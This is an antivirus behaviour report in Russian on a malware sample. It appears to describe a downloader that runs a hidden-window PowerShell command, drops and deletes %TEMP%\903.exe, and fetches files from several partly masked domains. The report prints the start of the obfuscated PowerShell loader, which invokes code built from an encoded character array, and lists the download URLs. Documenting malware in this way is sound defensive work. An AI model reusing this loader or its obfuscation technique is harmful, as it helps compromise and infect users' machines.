Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' . ((GV '*MDr*').NAme[3,11,2]-joiN'')( " $( set-VaRiable 'oFS' '' )"+[sTrinG]( (1 , 81,124 , 112,24 , 75 , 64, 82 , 8 , 74, 71 ,79,64, 70 , 81, 5 , 107 , 64 , 81,11, 114 , 64 ,71,102 , 73 , 76,...
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\903.exe
Удаляет следующие файлы
- %TEMP%\903.exe
Сетевая активность
Подключается к
- 'er#####ryapimarket.com':80
- 'hb##nte.com':80
- 'uk#.me':80
- 'wo##f.in':80
- 'gt###uae.com':80
TCP
Запросы HTTP GET
- http://er#####ryapimarket.com/vqfX/
- http://hb##nte.com/JfDz/vFk5u5/
- http://uk#.me/Oi9tQ0b/
- http://ww##.uka.me/Oi9tQ0b/?su#########################################
- http://wo##f.in/SheqtIxR3U/050euiM/
- http://gt###uae.com/3Dha4/
UDP
- DNS ASK er#####ryapimarket.com
- DNS ASK hb##nte.com
- DNS ASK uk#.me
- DNS ASK ww##.uka.me
- DNS ASK wo##f.in
- DNS ASK gt###uae.com
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' . ((GV '*MDr*').NAme[3,11,2]-joiN'')( " $( set-VaRiable 'oFS' '' )"+[sTrinG]( (1 , 81,124 , 112,24 , 75 , 64, 82 , 8 , 74, 71 ,79,64, 70 , 81, 5 , 107 , 64 , 81,11, 114 , 64 ,71,102 , 73 , 76,...' (со скрытым окном)
